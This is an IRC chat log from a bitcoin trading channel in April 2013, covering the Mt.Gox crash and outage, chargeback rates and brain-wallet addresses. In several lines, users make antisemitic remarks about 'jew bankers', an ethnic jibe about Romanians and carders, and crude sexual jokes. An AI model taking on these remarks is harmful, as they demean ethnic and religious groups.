a fed announcement, lol Apr 11 03:15:51 lol Apr 11 03:15:56 [BTCTC] [PAJKA.BOND] 1 @ 0.1019 BTC [-] Apr 11 03:15:58 mircea_popescu, even my hairdresser understands that a deflationary currency is worth more tomorrow Apr 11 03:15:59 that's pretty huge for btc really. Apr 11 03:16:06 yeah Apr 11 03:16:10 i mean... people see it "bust" and still worth more than the dollar. Apr 11 03:16:24 i mean, i think the fact that we bounce back after a 3x (by price) bigger drop than the 2011 crash Apr 11 03:16:31 speaks to the fact that this is here Apr 11 03:16:34 and its not going anywhere Apr 11 03:16:35 every time i refresh http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png i get a different image and sccale Apr 11 03:18:26 peace out all Apr 11 03:18:42 vires in numeris Apr 11 03:18:52 lol Apr 11 03:19:13 ciao MJR_ Apr 11 03:20:31 they talk about it here on CNBC @ ~4:00 => http://video.cnbc.com/gallery/?play=1&video=3000160452 Apr 11 03:20:43 ugh Apr 11 03:21:39 Maria: "... But Bill, where's the money!" Apr 11 03:22:09 well, i guess ~4:30 mins in Apr 11 03:22:47 [BTCTC] [ASICMINER-PT] 1 @ 0.719 BTC [-] Apr 11 03:23:02 [BTCTC] [ASICMINER-PT] 1 @ 0.702 BTC [-] Apr 11 03:23:52 Santelli interviewed the BTC ATM guy a week or so ago. That was kinda neat. Apr 11 03:26:54 they really wana squash gold. Apr 11 03:27:06 ;;goxlag Apr 11 03:27:07 MtGox lag is 0.545224 seconds. During this time, light travels 0.00109262279137 AU. You could have sent a bitcoin to the other side of the Earth, along the surface (0.0001339 AU). **** BEGIN LOGGING AT Thu Apr 11 11:18:50 2013 Apr 11 11:25:13 . Apr 11 11:38:22 [MPEX] [S.MPOE] 2077 @ 0.00070625 = 1.4669 BTC [-] Apr 11 11:38:24 [MPEX] [S.MPOE] 1048 @ 0.00069712 = 0.7306 BTC [-] Apr 11 11:41:57 [BTCTC] [ASICMINER-PT] 3 @ 0.77 = 2.31 BTC [-] Apr 11 11:46:36 so curious.. what kind of crack pipe are the gox ks smoking if they think that it's a sign of success that their shitty trading system caused a flashcrash? Apr 11 11:53:49 bgupta they have been pulling that deluded crap pretty much as their signature since 2011. Apr 11 11:55:01 they were honest.. but I was like "you are celebrating this".. mmm guess they made a ton of commissions so they were in the mood to celebrate? Apr 11 11:55:24 do they still take Magic cards? Apr 11 11:55:57 I should sent them a few boxes via freight Apr 11 11:56:02 As far as I know that guy is doing something else now. (Sold the exchange) Apr 11 11:59:19 bgupta honesty apparently means different things to different people. Apr 11 12:01:20 they basically said "yay the market crashed because our systems couldn't keep up with demand! we rock!!" Apr 11 12:02:34 ;;ticker Apr 11 12:02:35 BTCUSD ticker | Best bid: 163.00001, Best ask: 163.38999, Bid-ask spread: 0.38998, Last trade: 163.00000, 24 hour volume: 244646.64497220, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 177.15869 Apr 11 12:03:30 bgupta: pathetic Apr 11 12:10:38 Scrat: Don't know if you read it: https://mtgox.com/press_release_20130411.html Apr 11 12:11:56 bgupta: i did, i replied to the forum post Apr 11 12:12:13 http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 11 12:12:16 my latest evil. Apr 11 12:12:35 [MPEX] [S.MPOE] 8015 @ 0.00070632 = 5.6612 BTC [+] Apr 11 12:17:43 [BTCTC] [RSM] 1 @ 0.00149 BTC [-] Apr 11 12:17:51 your page not available here MP Apr 11 12:17:55 gox is down Apr 11 12:18:00 ;;goxlag Apr 11 12:18:12 you getting DDoSed or overload? :) Apr 11 12:18:23 gox said they were going down Apr 11 12:18:29 to add more server Apr 11 12:18:31 cause success Apr 11 12:18:49 Error: Problem retrieving gox lag. Try again later. Apr 11 12:19:02 ZedsterX gah looking into this Apr 11 12:19:17 kakobrekla: he said in the next 12 to 24 hours Apr 11 12:19:31 no problem after yesterdays crash i can't afford to read your articles :) Apr 11 12:19:39 maybe they were including goxlag or smth into dat Apr 11 12:19:40 right now it's 4 hours after the press release Apr 11 12:19:44 lol Apr 11 12:20:39 mtgox website down? Apr 11 12:21:08 nvm Apr 11 12:21:56 maintenance Apr 11 12:22:29 ok they should do this more often.. I'd be able to get more work done ;) Apr 11 12:22:34 https://www.facebook.com/MtGox?ref=stream Apr 11 12:23:26 Gox has crashed.. gonna sell all my btc for $1 each on otc.. brb... Apr 11 12:25:17 mkay this is a significant increase in ddos. Apr 11 12:25:20 up now MP Apr 11 12:25:32 i doubt they've crashed. i think they got a taste of 200mbps Apr 11 12:27:12 okay, everyone get your trades through if you were contemplating anything Apr 11 12:27:16 this promises to be a bumpy weekend. Apr 11 12:28:06 my anus is ready Apr 11 12:29:47 [MPEX] [S.MPOE] 5698 @ 0.00070858 = 4.0375 BTC [+] Apr 11 12:29:49 [MPEX] [S.MPOE] 1652 @ 0.00069712 = 1.1516 BTC [-] Apr 11 12:31:33 Scrat: TMI Apr 11 12:31:51 mircea, I got my trades throught at 230-250 already Apr 11 12:31:54 I'm all good Apr 11 12:32:21 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [-] Apr 11 12:32:28 I took a screenshot of clarkmoody at the peak Apr 11 12:32:30 http://i.imgur.com/1uwrLCA.png Apr 11 12:33:02 The price rise is almost vertical over a few weeks and totally dwarfs 2011's bubble Apr 11 12:34:29 lol nice screencap Apr 11 12:35:12 so in 2015 to excpect about 200 to 2000 bubble? Apr 11 12:35:25 I was looking at price and the 2011 looked like such a small bump... I thought, I've got to take some money there Apr 11 12:35:45 I withdrew funds available on the various exchanges, sent to gox and sold Apr 11 12:36:05 Soon after the crash occured. Apr 11 12:36:10 I was just in time. Apr 11 12:36:24 Too bad the free BTC was only a fraction of my portfolio Apr 11 12:38:01 [HAVELOCK] [VTX] 1 @ 0.29999998 BTC [+] Apr 11 12:44:20 [MPEX] [O.USD.P128T] 1 @ 0.06702997 BTC Apr 11 12:47:40 [MPEX] [S.MPOE] 3059 @ 0.00071544 = 2.1885 BTC [+] Apr 11 12:47:48 [MPEX] [S.MPOE] 4346 @ 0.00071567 = 3.1103 BTC [+] Apr 11 12:49:11 well that's always the case neh ? Apr 11 12:49:11 [12:31] @MagicalTux: why exactly would a ddos affect the matching and execution engine? Apr 11 12:49:11 [12:31] <@MagicalTux> bit14: overloading system cpu Apr 11 12:49:11 [12:31] <@MagicalTux> ddos are not all about cpu Apr 11 12:49:11 [12:32] @MagicalTux: wouldn't the front end and execution engine be on different machines? Apr 11 12:49:11 [12:32] <@MagicalTux> bit14: not yet Apr 11 12:49:23 heh. Apr 11 12:50:59 ;;ticker Apr 11 12:51:03 neamwhile in switzerland https://www.youtube.com/watch?feature=player_embedded&v=vsXs3GUrw64#! Apr 11 12:51:27 ;;ticker Apr 11 12:51:40 or not Apr 11 12:52:01 Error: Failure to retrieve ticker. Try again later. Apr 11 12:52:19 BTCUSD ticker | Best bid: 146.76500, Best ask: 148.00000, Bid-ask spread: 1.23500, Last trade: 143.00000, 24 hour volume: 247104.13417462, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 175.50181 Apr 11 12:52:48 Do you suppose what MagicalTux is talking about are all the massive 0.01 orders? Apr 11 12:54:28 as i was saying yesterday, if each execution of an order requires gox to recaculate a bunch of things such as your current fee bracket, in addition to properly matching, then mangification at the cpu level is possible. and another argument for throttling oders per second per user until gox finds solutions Apr 11 12:54:40 in the paralel if relative distant universe where tux knows what he's talking about Apr 11 12:54:48 he could in principle be talking about that or anything else. Apr 11 12:55:04 gesell: that is their faulty engine design, and i predicted this like two weeks ago Apr 11 12:55:20 [BTCTC] [ASICMINER-PT] 1 @ 0.76 BTC [-] Apr 11 12:55:21 they dont know jack about anything, im tired of the ameteurish nature of all of this :( Apr 11 12:55:26 please jew bankers rescue us Apr 11 12:55:44 lol taub Apr 11 12:55:45 taub: dont worry, max keiser will save us Apr 11 12:56:03 this is where i replug http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 11 12:56:08 im sure he's going to say something big any time now ;) Apr 11 12:56:20 at least jew bankers know to isolate their website from their trading system Apr 11 12:56:47 exactly Apr 11 12:57:08 well... mpex is the only one doing that, and i ain't jewish Apr 11 12:57:24 also i explained what it is and why it should be done, but tards like tux think tjhey know shit Apr 11 12:57:27 ie, better than me. Apr 11 12:57:38 mircea_popescu: thanks for the post. finally someone giving numbers Apr 11 12:58:07 yeah, gox should switch to the PGP protocol for all orders :) Apr 11 12:58:47 actually there are sound proposal for true p2p exchanges Apr 11 12:58:51 problem is getting fiat in and out Apr 11 12:59:02 yep Apr 11 12:59:06 you basically need some kind of "jew bankers", and assuming the escrow fraud to manipulate the market Apr 11 12:59:12 its 20% tax on fiat in/out Apr 11 12:59:23 but might be worth to some people Apr 11 12:59:29 maybe ripple can help in this? getting money into the exchanges Apr 11 12:59:32 gesell no, just to separate trading engine. Apr 11 12:59:35 why 20%? Apr 11 12:59:40 there's things they can do and things they can't do Apr 11 12:59:43 punkman: ripple. Apr 11 13:00:12 simply, people being anonymous means that 20% of them will turn out to be scumbags Apr 11 13:00:16 and you have to subsidize that Apr 11 13:00:41 lol where you got your number from ? Apr 11 13:00:47 mircea_popescu: chargeback rates Apr 11 13:00:51 on creditcards Apr 11 13:01:03 where exactly are chargeback rates 20% ? Apr 11 13:01:07 everywhere Apr 11 13:01:11 thanks to carders Apr 11 13:01:11 you can't have 20% chargeback rate, they shut you down Apr 11 13:01:11 ... Apr 11 13:01:14 you oughta know Apr 11 13:01:17 youre romanian :) Apr 11 13:01:22 very smart. Apr 11 13:01:56 mircea_popescu: well, assuming there is ripple for pp/cc Apr 11 13:02:03 we shall assume same chargeback rates Apr 11 13:02:12 ie immense amount of abuse from hacked accounts Apr 11 13:02:26 you don't have to get fiat in between p2p exchanges - you could settle in btc Apr 11 13:02:39 pizzaman1337: we're talking btc/fiat exchanges Apr 11 13:02:42 there is no system in this world with 20% chargeback rates. either you have a working system and chargebacks are a fraction of a percent Apr 11 13:02:44 yeah Apr 11 13:02:48 of course btc/ltc/whatever exchanges can be pure p2p Apr 11 13:02:48 or you're fucked, in which they're closer to 100% Apr 11 13:04:10 mircea_popescu: in average, its supposedly about 20% (cant find the source atm, but i assume you'll get similiar number if you google hard) Apr 11 13:04:18 don't assume. Apr 11 13:11:11 you know what's a fun read, those 500 page Visa PDFs explaining all you ever wanted to know about credit cards Apr 11 13:11:35 lol Apr 11 13:11:42 wait, I mean no fun at all Apr 11 13:11:54 "all you never cared to know about idiotic topic #345789348975 and therefore you didn't ever ask" Apr 11 13:12:02 should be a book line. Apr 11 13:12:02 [HAVELOCK] [VTX] 2 @ 0.29999998 = 0.6 BTC [+] Apr 11 13:12:43 [BTCTC] [COGNITIVE] 1 @ 0.1226 BTC [+] Apr 11 13:13:23 [BTCTC] [COGNITIVE] 60 @ 0.1226 = 7.356 BTC [+] Apr 11 13:13:25 did I say 500 pages? I meant 1250, http://usa.visa.com/download/merchants/visa-international-operating-regulations-main.pdf Apr 11 13:13:27 [BTCTC] [COGNITIVE] 10 @ 0.1227 = 1.227 BTC [+] Apr 11 13:13:30 [BTCTC] [COGNITIVE] 27 @ 0.1229 = 3.3183 BTC [+] Apr 11 13:13:34 [BTCTC] [COGNITIVE] 26 @ 0.124 = 3.224 BTC [+] Apr 11 13:13:59 http://usa.visa.com/download/merchants/visa_risk_management_guide_ecommerce.pdf Apr 11 13:14:04 hehe Apr 11 13:14:05 [BTCTC] [COGNITIVE] 13 @ 0.12966 = 1.6856 BTC [+] Apr 11 13:14:15 and then you have guys like ccbill Apr 11 13:14:43 which is mostly bullshit Apr 11 13:14:45 perhaps you mean 20% attempted frauds Apr 11 13:14:51 which they don't let through Apr 11 13:15:15 I had to do the PCI compliance thing once, had to tick gems such as "- you regularly run antivirus scans on your servers" Apr 11 13:15:17 punkman: we're talking ultimate costs Apr 11 13:15:32 punkman: sure the chargeback dont get through, the fraud rate is like 0.1-3% tops Apr 11 13:15:44 but actual costs are *much* higher Apr 11 13:16:15 Scrat: lol :) Apr 11 13:16:17 yes the merchant gets a fine for each chargeback Apr 11 13:16:24 hi there Apr 11 13:16:45 the merchant shouldn't get the fine... Apr 11 13:16:58 yes thery should. Apr 11 13:17:09 if i ran visa everyone to ever lose a card would be fined $500 Apr 11 13:17:11 they're to motivate to filter out fraudulent customers Apr 11 13:17:24 the merchant should get a huge fine IF it is found they frauded someone. Apr 11 13:17:34 Oh, from Visa's point of view, sure, they should Apr 11 13:17:44 ie you'll not survive the outrageous fees (supposedly up to $250) if you cant filter abuse Apr 11 13:17:50 "Police in New Jersey are on the hunt for the criminal behind the theft of $100,000 of hamburger patties" Apr 11 13:17:54 It's the easiest way to tax merchants on handling complaints. Apr 11 13:17:54 this to go with the nutella earlier Apr 11 13:18:27 damn... nutella/burger patties sandwiches? Apr 11 13:18:35 Someone planning a neat diet Apr 11 13:18:55 or maybe the merchant should fine Visa for letting their cards get stolen Apr 11 13:18:56 hi mircea_popescu Apr 11 13:19:15 makomk malaimo maradona markedathome metabyte mE\Ta midnightmagic MiningBuddy mircea_popescu MJR_ mjr___ mod6 mpexbot Apr 11 13:19:17 hi MJR_ Apr 11 13:19:47 nice article Apr 11 13:19:50 punkman: thats what 3d-secure is for Apr 11 13:19:58 never pay with 3d secure :) Apr 11 13:20:36 (its the small print that fraudulent costs are passed on you, since uh, its 3d and secure, thus cant be stolen) Apr 11 13:21:11 ;;seen smickles Apr 11 13:21:11 smickles was last seen in #bitcoin-assets 6 days, 18 hours, 38 minutes, and 36 seconds ago: a bitcoin atm could be the easiest way to send money to a friend, each of you just goes to an atm Apr 11 13:21:24 where has smickles been? Apr 11 13:21:29 smickles: hi Apr 11 13:21:34 !ticker m s.dice Apr 11 13:21:35 ;;ticker Apr 11 13:21:36 [MPEX:S.DICE] 1D: 0.0027 / 0.00300501 / 0.003289 (23267 shares, 69.92 BTC), 7D: 0.0027 / 0.00285732 / 0.00333333 (218637 shares, 624.72 BTC), 30D: 0.0027 / 0.00350541 / 0.00599987 (1764568 shares, 6,185.54 BTC) Apr 11 13:21:36 BTCUSD ticker | Best bid: 140.50125, Best ask: 141.57000, Bid-ask spread: 1.06875, Last trade: 141.57000, 24 hour volume: 247211.87558680, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 174.53931 Apr 11 13:21:44 MJR_ iirc he has a child due Apr 11 13:21:52 ah, congrats to him, i hope Apr 11 13:21:58 Hahaha : 24 hour low: 105.00000, 24 hour high: 266.00000 Welcome in BTCLAND Apr 11 13:22:11 i hope that smarted. Apr 11 13:22:25 i like that word, it clearly shows what's needed for making people smarter. Apr 11 13:22:49 To give you an idea of how impressive things were here are some numbers that we would love to share with you guys: - The number of trades executed tripled in the last 24hrs. - The number of new account opened went from 60k for March alone to 75k new account created for the first few days of April! We now have roughly 20,000 new accounts created each day. Apr 11 13:22:56 nice spin? Apr 11 13:23:05 yes, gox, you were very "impressive" yesterday Apr 11 13:23:08 Mt gox ? Apr 11 13:23:12 yes Apr 11 13:23:19 this is their "PR" from yesterday Apr 11 13:23:25 again, victim of our own success Apr 11 13:23:36 cuz obvs they are teh best...l33t Apr 11 13:23:39 cmon :D stop kidding me before my coffee Apr 11 13:23:45 not shitting you Apr 11 13:23:53 75K for april ? :D Apr 11 13:23:53 https://mtgox.com/press_release_20130411.html Apr 11 13:23:57 there is article Apr 11 13:24:00 fucking hilarious Apr 11 13:24:01 i think mtgox pr money is well spent Apr 11 13:24:05 kudoz to their copywriter Apr 11 13:24:05 almost the same in 2012 ? Apr 11 13:24:09 the egos on these guys... Apr 11 13:24:31 we were directly responsible for a panic that resulted in a drop of over 50%...we are just that good Apr 11 13:24:51 MtGox.com ?@MtGox 49m Apr 11 13:24:51 Maintenance Over however we are now under a DDoS attack. Apr 11 13:25:11 sorry if thats a repost Apr 11 13:25:12 (they actually claim that they caused the panic sale due to how much volume increased) Apr 11 13:25:14 yep MJT i can't open the link Apr 11 13:25:29 LOL, keep reloading it eventually will get there Apr 11 13:25:51 ZedsterX: translation: maintainance takes much longer than expected, but lets play we're the victim here. Apr 11 13:26:03 lol Apr 11 13:26:23 http://pastebin.com/H4wLsYTi i pastebined it for you guys Apr 11 13:26:52 mircea_popescu: it is hilarious Apr 11 13:26:53 for two hours in the next 12 to 24hrs Apr 11 13:26:55 see that right there Apr 11 13:27:03 that pr guy could be a politician Apr 11 13:27:05 or a lawyer Apr 11 13:27:07 hahaha Apr 11 13:27:09 thanks MJR Apr 11 13:27:23 yes, most of you now think of getting screwed as getting "goxxed" but i can make this look good Apr 11 13:27:29 idjits Apr 11 13:29:11 MJR_ thanks. http://trilema.com/2013/its-been-an-epic-few-days-what-happened/#comment-92701 Apr 11 13:29:15 i've added it for the ages. Apr 11 13:29:16 it is kinda funny that on gox's twitter they say don't panic network maintance then 8 minutes later we are under ddos Apr 11 13:30:10 ZedsterX it's not lieing if you say stuff that's not true Apr 11 13:30:13 it's just pr. right ? Apr 11 13:30:31 bad pr is good pr Apr 11 13:30:50 ask bFL :) Apr 11 13:31:16 they must happy with the spot moved a bit Apr 11 13:31:20 light* Apr 11 13:31:42 mircea_popescu: i think the phrase is "wording" Apr 11 13:31:52 gox is just wording us Apr 11 13:32:02 word Apr 11 13:32:04 hehe Apr 11 13:33:26 lol Apr 11 13:33:27 maybe bitcoin will transition from cult of getrichquick to cult of personality Apr 11 13:33:46 kinda like max kaiser being the jesus preaching light of tomorrow, and mircea_popescu the evil guy Apr 11 13:33:52 o gawd. Apr 11 13:33:59 do you know how many jesuses we've had to date ? Apr 11 13:34:16 MP isn't god? Apr 11 13:34:41 now i'm really confused Apr 11 13:34:57 i used to be but i was just not very good at it. Apr 11 13:35:08 ZedsterX: bad guy Apr 11 13:35:13 preaching bad things for bitcoin Apr 11 13:35:19 but a lot of followers apparently Apr 11 13:35:25 max kaiser the polar opossite Apr 11 13:36:00 well couldn't have done any worse the current person on that throne Apr 11 13:36:01 yeah, keiser is the polar opposite, inasmuch as clues go. Apr 11 13:36:09 the resemblance of bitcoin to religious cults is certainly here Apr 11 13:40:53 ;;ticker Apr 11 13:41:04 Error: Failure to retrieve ticker. Try again later. Apr 11 13:41:28 gribble, dont beat the dead horse Apr 11 13:48:22 mornin gribble Apr 11 13:52:24 price what, around 140? Apr 11 13:52:31 morning all ;) Apr 11 13:52:58 deadweasel http://trilema.com/2013/in-which-noobs-learn-lessons-and-pay-for-the-privilege/ Apr 11 13:53:08 my friendly evil psa service. Apr 11 13:53:14 ah thx Apr 11 13:54:34 118$ Apr 11 13:55:23 118€*... my bad, yes it's 140 Apr 11 13:55:57 lol great article Apr 11 13:56:17 i bet many a rectum are sore this morning Apr 11 13:56:54 good. Apr 11 13:57:05 that's the true sign of a good fucking. Apr 11 13:57:52 the kind that stinks afterwards Apr 11 13:57:56 great post. have your readers increased in the last few months? any data on that? Apr 11 13:58:39 12:58.00 ( coinmaster ) [Stamp] BTC 75.000 USD (-63.990 USD) Apr 11 13:58:43 now Apr 11 13:58:49 deadweasel i don't really keep very close track Apr 11 13:58:55 kakobrekla buy! Apr 11 13:59:44 too late this time Apr 11 14:04:40 ;;ticker Apr 11 14:05:11 Error: Failure to retrieve ticker. Try again later. Apr 11 14:06:14 fud ? http://pastebin.com/j9VZxYA9 Apr 11 14:08:19 uhh.. Apr 11 14:09:12 looking at the emails, probably Apr 11 14:09:13 kakobrekla ohohohoh Apr 11 14:09:31 total fud Apr 11 14:10:21 like 140 aint cheap enough Apr 11 14:12:14 anyone done whale watching on the orderbooks recently? Apr 11 14:13:16 i can tell ya change password is broken in gox right now Apr 11 14:13:50 emails list from 2011 hack !? #itspossiblyascam Apr 11 14:15:59 i think its kinda funny how butthurt lew rockwell is about bitcoin Apr 11 14:16:08 or that he doesnt take it seriously Apr 11 14:16:16 well time will come :( Apr 11 14:17:24 if anyone want to contribute to the 1btc fund 1KSHjG4etUA1gBdpKRecoRbmxv4N2TLyFM Apr 11 14:17:33 ima send them the brain wallet and publish the results. Apr 11 14:19:18 um wtf Apr 11 14:19:22 is brainwallet broken ?! Apr 11 14:19:51 that addy doesnt work Apr 11 14:19:55 mircea popescu did call it spot on..for a while now. sure goes along with what i've mostly noticed in life: too much of a good thing is usually not a "good thing". Apr 11 14:20:13 wtf, Apr 11 14:20:19 can u double check the address ? Apr 11 14:20:26 i just generated it in brain wallet. Apr 11 14:20:28 is the site broken ? Apr 11 14:20:30 mtgox might just be ddos'ing themselves so that all that new fiat coming into the exchange via wire for new users that wont want to spend it on btc anymore can be put in a low interest bank account by gox to make them rich Apr 11 14:20:35 http://brainwallet.org/ Apr 11 14:20:42 ;) Apr 11 14:21:23 brainwallet doesnt work with Porn relative password MP Apr 11 14:21:30 ok i can't get a usable address with brainwallet.org. all the addies it outputs are broken Apr 11 14:21:34 anyone know an alternative ? Apr 11 14:22:00 https://www.bitaddress.org/bitaddress.org-v2.4-SHA1-1d5951f6a04dd5a287ac925da4e626870ee58d60.html Apr 11 14:22:17 or, just the domain Apr 11 14:23:18 hmm did i just give some indentifer up? Apr 11 14:23:43 no Apr 11 14:24:02 what is this? 1d5951f6a04dd5a287ac925da4e626870ee58d60 Apr 11 14:24:05 its the SH1 Apr 11 14:24:06 13M1JEPDnSGLKMXXzGDSSQUuzqQwvsrVYS Apr 11 14:24:09 fuck this doesn't workl either Apr 11 14:24:20 when you DL the wep page to make paper wallet offline Apr 11 14:24:23 probly just uses brainwallet.org Apr 11 14:24:28 12bASRScqN1StAzbWxqSUtqKWKZK9nfHgY Apr 11 14:24:37 not a single address i generate works. what the fuck is this ?! Apr 11 14:24:41 did someone change the algo ? Apr 11 14:24:48 maybe thats the anonymous joke Apr 11 14:24:50 you need to make the sum, to see if its the right Apr 11 14:24:53 hahaha Apr 11 14:24:53 they hacked brain wallet Apr 11 14:25:21 for fucks sake ?! Apr 11 14:26:30 work for me Apr 11 14:26:46 1HiZZ1YbP6tBgEXvo1RMs3jWfbBswq7Yeg Apr 11 14:27:14 i wonder if my js is broken Apr 11 14:27:15 plz confirm working address we arepooling in Apr 11 14:27:41 error4733 pm me the sikrit for that one Apr 11 14:27:44 ill email it Apr 11 14:28:25 morning - more volatility overnight i see... Apr 11 14:28:34 mine was un test !! dont send any money Apr 11 14:28:39 mp: nice PSA Apr 11 14:28:41 error4733 but srsly make me one. Apr 11 14:28:55 pgp i like you spell volatility right. it's so rare Apr 11 14:28:59 if only people would listen Apr 11 14:29:10 lol Apr 11 14:29:25 the beauty of bitcoin : nobody has to listen. Apr 11 14:29:43 as long as they can afford to pay all fines bitcoin may throw at them for it. Apr 11 14:30:20 lol Apr 11 14:30:22 1Pbfdh8ECrhEtVx3m1oeFAfUFG7NoQUKqr << address. Apr 11 14:30:25 i sent a btc. Apr 11 14:32:26 [MPEX] [S.MPOE] 681 @ 0.00070306 = 0.4788 BTC [-] Apr 11 14:32:54 yep Apr 11 14:32:57 that is how i see it Apr 11 14:33:23 there is nothing anyone "should" do, they do whatever they want...the market sorts it out, but there are smarter and dumber things to do Apr 11 14:33:48 if you look at it from the "i kan haz monies" perspective Apr 11 14:34:26 NO WAIT Apr 11 14:35:22 http://pastebin.com/Kd093NQi Apr 11 14:36:29 heheh i'm confused, is money still needed for anonymous wallet? Apr 11 14:37:12 i guess not for an empty wallet Apr 11 14:37:22 ThickAsThieves never was needed. just, if anyone wanted to add Apr 11 14:37:25 i already sent a btc. Apr 11 14:37:29 ah Apr 11 14:37:43 looks like its already out Apr 11 14:38:31 what is ? Apr 11 14:39:31 that pastebin isnt? Apr 11 14:39:58 i have no idea. Apr 11 14:40:05 none of those passes work Apr 11 14:40:11 or do they need to be decrypted? Apr 11 14:40:59 how to whale watch the asks on the orderbook: Apr 11 14:41:01 curl -s https://data.mtgox.com/api/2/BTCUSD/money/depth/full | python -c 'import sys,json;data=json.loads(sys.stdin.read()); print data["data"]["bids"]' | awk -v RS='{' '{print}' | tr -d '[]{}' | egrep "price_int': u'[1-9][0-9][0-9]{6}'," | egrep "amount': [1-9][0-9]{3}\." | awk '{print $2 $5 $6 $9 $10}' | sed "s/u'/ /g" | sed "s/[',]//g" | sort -n | cut -b 2-11 -b 18- && date +%s Apr 11 14:43:26 anybody know how the ticker on #bitcoin-market works? seems like the most reliable ticker out there, no? Apr 11 14:44:32 Right.. You know it would be simpler to just use python for all of this? Or awk? At least give both sed commands to the first instance, instead of forking twice just for that! Apr 11 14:46:38 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 11 14:46:46 [BTCTC] [ASICMINER-PT] 1 @ 0.7699 BTC [+] Apr 11 14:46:53 those are actually good points. Apr 11 14:48:20 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 11 14:48:41 pgp: it pulls data from bitcoincharts Apr 11 14:49:14 sturles: feel free to change it. i just got lazy and actually executing python from the command line was total hell to figure out. (cant really do a "if-else" on it) Apr 11 14:50:11 the joy of significant whitespace languages Apr 11 14:50:30 so bitcoincharts api was unaffected yesterday? really? Apr 11 14:51:09 seems like many others realy in bitcoincharts were hosed yesterday... Apr 11 14:51:11 well why not, it's static data and you can cache it effectively Apr 11 14:51:20 ;;ticker Apr 11 14:51:25 it went down a few times Apr 11 14:51:28 BTCUSD ticker | Best bid: 162.13873, Best ask: 163.00000, Bid-ask spread: 0.86127, Last trade: 162.13873, 24 hour volume: 247191.76866132, 24 hour low: 105.00000, 24 hour high: 266.00000, 24 hour vwap: 172.81754 Apr 11 14:52:27 Scrat:could always revert to perl but then i'd probably start puking involuntarily Apr 11 14:53:19 anyone know of a historical repository for this data that doesn't require me to grab individual exchange json's from bitcoincharts for tiny intervals that won't return most of the time anyway? Apr 11 14:53:40 [BTCTC] [ASICMINER-PT] 1 @ 0.77 BTC [+] Apr 11 14:54:20 pgp it was down for half the day Apr 11 14:54:45 right, that's what I thought, but #bitcoin-market seemed to be chugging along... Apr 11 15:01:39 eskimobob - orderbook is only avail through api... go to clarkmoody.com to see it Apr 11 15:04:40 coinbr withdraws comes directly from mpex? Apr 11 15:05:04 EskimoBob, you can also trade $0.001 USD via API but not via site :P Apr 11 15:09:34 [BTCTC] [PAJKA.BOND] 1 @ 0.1019 BTC [-] Apr 11 15:10:44 ;;market --sell 3000 Apr 11 15:10:44 A market order to sell 3000 bitcoins right now would net 437428.6661 USD and would take the last price down to 140.0000 USD, resulting in an average price of 145.8096 USD/BTC. | Data vintage: 74.3326 seconds Apr 11 15:11:18 ;;market --buy 3000 Apr 11 15:11:19 A market order to buy 3000 bitcoins right now would take 508573.6610 USD and would take the last price up to 174.9900 USD, resulting in an average price of 169.5246 USD/BTC. | Data vintage: 108.0862 seconds Apr 11 15:14:13 MP, other assembled Brainiacs... Is the only alternative to Mt. Gox to switching to other traditional (centralized) exchanges, one of which will swell to 80% eventually? Or is decentralized exchange somehow possible? Apr 11 15:14:26 unbalanced localbitcoins for instance. Apr 11 15:14:39 yeah, what's the volume on localbitcoins anyway? Apr 11 15:14:41 Yeah, OTC, localbitcoins... Apr 11 15:14:47 also otc is a good choice. Apr 11 15:14:56 i don't honestly think we need much more or anything other than this. Apr 11 15:15:02 person to person bitcoin. Apr 11 15:15:25 ...says the guy who expects users to grok commandline gpg Apr 11 15:15:39 That's fine for a subset of users. Apr 11 15:15:44 i don't expect users to grok commandline gpg. Apr 11 15:15:57 i expect people who don't to have somebody who does do their investi9ng for them. Apr 11 15:16:15 something along the lines of, "if you're too drunk to stand no way you're driving" Apr 11 15:16:24 even if driving is kinda cool and everything. Apr 11 15:16:28 agreed Apr 11 15:16:44 and even if you drive seated not standing Apr 11 15:16:49 and even if everything else. Apr 11 15:17:18 Putting bitcoin stocks/bonds/options aside for a sec, if I just think of buying and selling bitcoins P2P... How do we put a web interface on distributed trust? Apr 11 15:17:31 http://bitcoin-otc.com/vieworderbook.php Apr 11 15:17:32 like that ? Apr 11 15:17:37 lol Apr 11 15:19:25 That is an excellent start... but only a start. I guess that's the logical one to build on though. Apr 11 15:20:46 e.g. have the bids and the asks up like a "normal" exchange but when you transact, you're not trading on an exchange, you're dealing direct with the counterparty after vetting their WOT rating, etc. Apr 11 15:21:31 unbalanced, wont work because some payment methods have higher premiums Apr 11 15:21:43 could do one for each payment method through Apr 11 15:21:46 (and the dudes selling code or the gambling links are tucked aside into other tabs) Apr 11 15:22:16 Who runs bitcoin-otc? Apr 11 15:22:46 nanotube Apr 11 15:23:02 I see the orderbook is JSON, that's good Apr 11 15:26:30 What do you guys think of Ripple? Does it accomplish this? Apr 11 15:26:33 HOLY SHIT Apr 11 15:26:47 wtf is this order on the ask book: u'stamp': u'1360289097384960', u'amount_int': u'100000000', u'price': 13370133701337, u'price_int': u'1337013370133700096', u'amount': 1 Apr 11 15:27:31 its a leet order Apr 11 15:28:15 this is some strange shit. orderboook flipping out sometimes Apr 11 15:29:22 i guess its normal actually Apr 11 15:29:34 a user could say they want to sell for 133713371337.00 USD Apr 11 15:30:09 Gox would probably fill it under conditions like yesterday Apr 11 15:31:03 [HAVELOCK] [VTX] 2 @ 0.29999998 = 0.6 BTC [+] Apr 11 15:31:22 iirc bitcoin.de works that way Apr 11 15:34:56 unbalanced: go build a tabbed version. tabs for payment method, tabs for gambling, dev for hire, etc... Apr 11 15:36:08 15.6k bets unaccounted for with S.DICE? uh oh... Apr 11 15:36:18 huh? Apr 11 15:36:25 https://bitcointalk.org/index.php?topic=80312.msg1799509#msg1799509 Apr 11 15:39:07 Yeah. Apr 11 15:39:57 Are they being DDOS'd? Apr 11 15:40:49 I don't think that's possible, the severs that handle the transactions aren't public-facing, right? Apr 11 15:41:04 lol Apr 11 15:41:12 sdice probably ran out of money Apr 11 15:41:18 time to sell your stock Apr 11 15:41:42 "Fire! 